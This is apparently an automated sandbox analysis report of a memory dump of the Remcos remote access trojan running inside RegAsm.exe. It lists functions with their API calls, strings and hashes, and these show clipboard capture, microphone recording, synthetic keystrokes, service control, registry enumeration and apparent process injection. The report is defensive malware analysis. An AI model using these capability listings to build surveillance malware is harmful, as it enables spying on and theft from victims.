
Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: eaab8b67e7b6580be4a98aed119734e72375e5a7ccfb46ae4999c1671cc17cb3
Instruction ID: fac30f2e37e154151ba5f09932d78796b5672d7f7f1631b14e77a4da00ed4c1d
Opcode Fuzzy Hash: eaab8b67e7b6580be4a98aed119734e72375e5a7ccfb46ae4999c1671cc17cb3
Instruction Fuzzy Hash: 7541B271604301ABCB14FB75DC5A86F37A9AB85744F40093EF916A36E1EF3C8905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00417C2D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00417E7A: __EH_prolog.LIBCMT ref: 00417E7F

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417D2A
CloseHandle.KERNEL32(00000000), ref: 00417D33
DeleteFileA.KERNEL32(00000000), ref: 00417D42
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417CF6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

0VG, xrefs: 00417D6F
Temp, xrefs: 00417C4E
@, xrefs: 00417CD8
0VG, xrefs: 00417D03
<, xrefs: 00417CD1

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$0VG$<$@$Temp
API String ID: 1704390241-2575729100
Opcode ID: 6490981a64139e2f7c45c88e4216906b760fa6cce46945bc9b20304eb8e86b35
Instruction ID: 743bab563fa925c91e9bd11877dc29bb9b78fb67e5c7396ab49355918e86c52c
Opcode Fuzzy Hash: 6490981a64139e2f7c45c88e4216906b760fa6cce46945bc9b20304eb8e86b35
Instruction Fuzzy Hash: 53415C319002099ACB14FB62DC56AFE7775AF10308F5041BEF506761E2EF7D1A8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041688E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0041688F
EmptyClipboard.USER32 ref: 0041689D
CloseClipboard.USER32 ref: 004168A3
OpenClipboard.USER32 ref: 004168AA
GetClipboardData.USER32 ref: 004168BA
GlobalLock.KERNEL32 ref: 004168C3
GlobalUnlock.KERNEL32(00000000), ref: 004168CC
CloseClipboard.USER32 ref: 004168D2

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: !D@
API String ID: 2172192267-604454484
Opcode ID: 1e95c87dd81197c0faa1525ce5f83db776d62bab686c5c844ee62cbcc00cfc6b
Instruction ID: 129740f40504877be21c885bea0291386d0f791e208c218662832cd19edc281c
Opcode Fuzzy Hash: 1e95c87dd81197c0faa1525ce5f83db776d62bab686c5c844ee62cbcc00cfc6b
Instruction Fuzzy Hash: CA012971204300DBC714AB72AC59AAE77A5AF84742F40047EF94A961E2EF38CC45CA69

Uniqueness

Uniqueness Score: -1.00%

Function 00413220 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413365
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413373
GetFileSize.KERNEL32(?,00000000), ref: 00413380
UnmapViewOfFile.KERNEL32(00000000), ref: 004133A0
CloseHandle.KERNEL32(00000000), ref: 004133AD
CloseHandle.KERNEL32(?), ref: 004133B3

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: 52a7676237ba6d645651e99c69b6921362ad08428583ea7eb57c2839e6cf684e
Instruction ID: 5c5bf2d68fde417aed129774ee901704837dfcc31a9725c6dfb724aa407e88ba
Opcode Fuzzy Hash: 52a7676237ba6d645651e99c69b6921362ad08428583ea7eb57c2839e6cf684e
Instruction Fuzzy Hash: 9B41E631104305BBE720AF65DC4AFAB7BACEF89725F10052EF655D1191DB38DA40C66E

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA5B Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA6A
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA81
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA8E
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA9D
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AAAE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AAB1

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: a617342fd7d0ab3f36a6b4bf1726268dedbc23e606f349c661561497bbda8e31
Instruction ID: c2f3bd219c20ba15e3fc912c542e610d52f6c467f259bd4982bc279ce16e436d
Opcode Fuzzy Hash: a617342fd7d0ab3f36a6b4bf1726268dedbc23e606f349c661561497bbda8e31
Instruction Fuzzy Hash: E211A931941318AFD711AF64DC85DFF3B6CDF45BA6B000026F90592191DB688D46EABA

Uniqueness

Uniqueness Score: -1.00%

Function 00447FE1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00447FF5

Part of subcall function 00446642: HeapFree.KERNEL32(00000000,00000000), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00448001
_free.LIBCMT ref: 0044800C
_free.LIBCMT ref: 00448017
_free.LIBCMT ref: 00448022
_free.LIBCMT ref: 0044802D
_free.LIBCMT ref: 00448038
_free.LIBCMT ref: 00448043
_free.LIBCMT ref: 0044804E
_free.LIBCMT ref: 0044805C

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6e582879fdb95b5eb241110b1c4896f2dbd4dfc0d6566bb9b95a81e2e81fb98c
Instruction ID: a35366ba27863770f41d020e2d809a06ff37228c29ccb260fdbf0525f8878b4a
Opcode Fuzzy Hash: 6e582879fdb95b5eb241110b1c4896f2dbd4dfc0d6566bb9b95a81e2e81fb98c
Instruction Fuzzy Hash: FD11B676500108BFDB01EF96C852CD93BA9FF05354B6241AAFE488F226DB35DE509B8D

Uniqueness

Uniqueness Score: -1.00%

Function 00455E45 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456F3F), ref: 00455E68

Strings

log, xrefs: 00455F0E, 00455F1A
acos, xrefs: 00455FE0
log10, xrefs: 00455EB2, 00455F02
pow, xrefs: 00455F4C, 00455FF8, 0045600B
sqrt, xrefs: 00455FEC
exp, xrefs: 00455F2D, 00455F8F
asin, xrefs: 00455FD4

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 6fe1295bdd25f4f1a78ee600a9a1b2496a6a8165ae1eb54d48c2b7636e0dbce5
Instruction ID: 0f57c59634fb7a4e7797d35698a15f7e89d6327b6ac9b7ea032057c8322c8714
Opcode Fuzzy Hash: 6fe1295bdd25f4f1a78ee600a9a1b2496a6a8165ae1eb54d48c2b7636e0dbce5
Instruction Fuzzy Hash: 2B517D7190090ACBCF10DF58E9581BEBBB0FB49306F614197D841A7396CB798E298B1E

Uniqueness

Uniqueness Score: -1.00%

Function 004173E3 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417443

Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C3EC

Sleep.KERNEL32(00000064), ref: 0041746F
DeleteFileW.KERNEL32(00000000), ref: 004174A3

Strings

dxdiag, xrefs: 00417438
\sysinfo.txt, xrefs: 004173EE
temp, xrefs: 004173F3
/t , xrefs: 00417422
open, xrefs: 0041743D

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 53fe67c8a736ce2cf92144bfd8a5f14a52e5548f1e7ea1588e1b88c3ebf211a1
Instruction ID: 08e178d58cb94228c3422c156c5c16405d07e5ed2aae09261949ad67490c1d9a
Opcode Fuzzy Hash: 53fe67c8a736ce2cf92144bfd8a5f14a52e5548f1e7ea1588e1b88c3ebf211a1
Instruction Fuzzy Hash: D5313F7194011A9ADB04FBA1DC96DED7775AF10309F40017EF506720E2EF785A8ACA9C

Uniqueness

Uniqueness Score: -1.00%

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E

Strings

explorer.exe, xrefs: 00407450, 0040747B
[-] NtAllocateVirtualMemory Error, xrefs: 0040743D
\explorer.exe, xrefs: 00407400
windir, xrefs: 004073EA
PEB: %x, xrefs: 004074AF
[+] NtAllocateVirtualMemory Success, xrefs: 00407410

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: aa5cd9ecb7971a6a383a6727390735fcfb4d164c4ff0a14e9513f7b96a95bb4b
Instruction ID: bc6dbff0aa7a72516d7c70bfac6cc66ded9047052da24c13ef57668a4d7cd7d0
Opcode Fuzzy Hash: aa5cd9ecb7971a6a383a6727390735fcfb4d164c4ff0a14e9513f7b96a95bb4b
Instruction Fuzzy Hash: 1C31A571A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8F8448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D50

Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F

Strings

%Y-%m-%d %H.%M, xrefs: 00401D41
dMG, xrefs: 00401D81
|MG, xrefs: 00401E08
.wav, xrefs: 00401D69

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
API String ID: 3809562944-243156785
Opcode ID: 5440b7f27a0b7c684a07a1fe7e947bc3438ad6ee44469cc2b6da6e6cae1fdd43
Instruction ID: 86e44ae8bedd0ebf4347f5aedf48d4a89b3e0c101edbf811c5c3d30ebe35e1e4
Opcode Fuzzy Hash: 5440b7f27a0b7c684a07a1fe7e947bc3438ad6ee44469cc2b6da6e6cae1fdd43
Instruction Fuzzy Hash: 793161315043019FC325EB61DD56A9A77A8EB94314F40443EF18DA21F2EFB89A49CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
waveInStart.WINMM ref: 00401CFE

Strings

PG, xrefs: 00401C27
dMG, xrefs: 00401BED
|MG, xrefs: 00401C9B

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: dMG$|MG$PG
API String ID: 1356121797-532278878
Opcode ID: c221aea4fce1c3107db83a77f38fb06dabf39ae871bf7de157c09f86457ff83c
Instruction ID: 20befe2c3b3cf13b08393a25abd1b36ed57efd15c64c44280ed0b29356de7c79
Opcode Fuzzy Hash: c221aea4fce1c3107db83a77f38fb06dabf39ae871bf7de157c09f86457ff83c
Instruction Fuzzy Hash: 15213971604201AFC7399F66EE05A6A7BB6EB84715B00803EA10DD76B1DBB84881CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3AB Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D3C4

Part of subcall function 0041D45D: RegisterClassExA.USER32 ref: 0041D4A9
Part of subcall function 0041D45D: CreateWindowExA.USER32 ref: 0041D4C4
Part of subcall function 0041D45D: GetLastError.KERNEL32 ref: 0041D4CE

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D3FB
lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D415
Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D42B
TranslateMessage.USER32(?), ref: 0041D437
DispatchMessageA.USER32 ref: 0041D441
GetMessageA.USER32 ref: 0041D44E

Strings

Remcos, xrefs: 0041D406

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: e282ba57f5f7090582ef61bd5218c64c1a6e96440b5edf8ca63e0eac7fc3bbf0
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: 7B015271800345EBD7109FA5EC4CFEABB7CEB85705F00402AF515931A1D778E885CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0044CC40 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 282ca1c1753427b6094a6c3e3f63531bf558f33043ba0ce9ddaab5374f53ab1f
Instruction ID: bc9101534197174687616f3321db5155530f9d2df3e04a4d6add1b90fa5dd2ef
Opcode Fuzzy Hash: 282ca1c1753427b6094a6c3e3f63531bf558f33043ba0ce9ddaab5374f53ab1f
Instruction Fuzzy Hash: 52C14970D05249AFEF51DFA9C881BAEBBB1EF09300F18415AE914A7392C73C8D45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00453CC4 Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453D70
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453DF3
__alloca_probe_16.LIBCMT ref: 00453E2B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00453F9D,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453E86
__alloca_probe_16.LIBCMT ref: 00453ED5
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453E9D

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F19
__freea.LIBCMT ref: 00453F44
__freea.LIBCMT ref: 00453F50

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: b8676272310d2f434511fe46bc856a16bcf003bfccc82e9bd6d42f4a00686227
Instruction ID: c41b4ac32cf2e64be7c3f772a3bd9f8c5d61163beb175bcb63f9ab3c35cfe47a
Opcode Fuzzy Hash: b8676272310d2f434511fe46bc856a16bcf003bfccc82e9bd6d42f4a00686227
Instruction Fuzzy Hash: 5E91E372E00216AADF218E65C841AEFBBB59F09787F14415BEC05E7282D73DDE48C768

Uniqueness

Uniqueness Score: -1.00%

Function 004450B9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

_memcmp.LIBVCRUNTIME ref: 00445363
_free.LIBCMT ref: 004453D4
_free.LIBCMT ref: 004453ED
_free.LIBCMT ref: 0044541F
_free.LIBCMT ref: 00445428
_free.LIBCMT ref: 00445434

Strings

C, xrefs: 00445221

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 3305cd451e6aff0206b9531717bec44e739628587ddcd8e7aba95792e2378f1b
Instruction ID: b193eef1824d512bc11d0bb5b1df730bd52d5cef41945038379268ca97d1a664
Opcode Fuzzy Hash: 3305cd451e6aff0206b9531717bec44e739628587ddcd8e7aba95792e2378f1b
Instruction Fuzzy Hash: 47B12975A016199FEB24DF18C885BAEB7B4FB08304F1085EEE949A7351D774AE90CF48

Uniqueness

Uniqueness Score: -1.00%

Function 00414858 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 00414994
tcp, xrefs: 004149C1

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: ec04a778613b02d88d88d5331b5d3629692560195fe72b535b1e99ed76cf7fff
Instruction ID: 9d76a0c9ad3deaf1f7ecf65dac24a6283800f1d85165e355cec6a2089a408fa6
Opcode Fuzzy Hash: ec04a778613b02d88d88d5331b5d3629692560195fe72b535b1e99ed76cf7fff
Instruction Fuzzy Hash: B47197B0A483428FDB24DE2884806ABB7E0AFD4785F15443FF88587351D778CD858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
ExitThread.KERNEL32 ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04

Part of subcall function 004346BE: __onexit.LIBCMT ref: 004346C4

Strings

NG, xrefs: 0040190D
@kG, xrefs: 00401888
XMG, xrefs: 00401902
NG, xrefs: 00401990

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: @kG$XMG$NG$NG
API String ID: 1649129571-2828059001
Opcode ID: ffd895c1ea1b51c06f6892f50b3bcd31a2d201c2413e317e7570506a6c29308a
Instruction ID: 65e0bbd845b0698e41ba7c367e27804c35fd250e2cfc12280843aa406abfdd31
Opcode Fuzzy Hash: ffd895c1ea1b51c06f6892f50b3bcd31a2d201c2413e317e7570506a6c29308a
Instruction Fuzzy Hash: 7E41D5312042009BC324FB26DD96ABE73A6ABD5314F00453FF55AA61F2DF386E49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000), ref: 00407A4D
MoveFileW.KERNEL32 ref: 00407A6A
CloseHandle.KERNEL32(00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: edf149fdbcee2574979640d259e60acbf1ce8fa6240b7d5026644c243e7e35de
Instruction ID: e874ae31f88d0aa3f072cf1e943b28158a3678564fa17fbb0695c37f8af014c9
Opcode Fuzzy Hash: edf149fdbcee2574979640d259e60acbf1ce8fa6240b7d5026644c243e7e35de
Instruction Fuzzy Hash: 80318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004198E1 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C), ref: 0041991A
SendInput.USER32(00000001,?,0000001C), ref: 0041993B
SendInput.USER32(00000001,?,0000001C), ref: 0041995B
SendInput.USER32(00000001,?,0000001C), ref: 0041996F
SendInput.USER32(00000001,?,0000001C), ref: 00419985
SendInput.USER32(00000001,?,0000001C), ref: 004199A2
SendInput.USER32(00000001,?,0000001C), ref: 004199BD
SendInput.USER32(00000001,?,0000001C), ref: 004199D9

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: dbafcd600a556151d3eaef7b7a040db0989071afdf7399d2c68b8699c8e8566f
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: 4E319471554309AEE311CF51DD41BEBBBDCEF98B54F00080FF68086291D2A699C98B97

Uniqueness

Uniqueness Score: -1.00%

Function 00444C3B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

_free.LIBCMT ref: 00444D46
_free.LIBCMT ref: 00444D5D
_free.LIBCMT ref: 00444D7C
_free.LIBCMT ref: 00444D97
_free.LIBCMT ref: 00444DAE

Strings

DD, xrefs: 00444C6B, 00444DED

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: DD
API String ID: 3033488037-393368396
Opcode ID: 8bfbc212e4dc99d16b5a17502b75c1b936a080bcf327fb9758477ad019b8ef1f
Instruction ID: 794643540ba05b1832729bfd17deba34f9ae2695eded42236b1100d7bffd7706
Opcode Fuzzy Hash: 8bfbc212e4dc99d16b5a17502b75c1b936a080bcf327fb9758477ad019b8ef1f
Instruction Fuzzy Hash: 1F51F571A00704AFEB20DF69C881B6A77F4EF89714F15456FE809D7251E739E901CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004139A3 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413A0A
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413A39
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413AD9

Strings

TG, xrefs: 00413B4B
xUG, xrefs: 00413B94
[regsplt], xrefs: 00413B65

Memory Dump Source

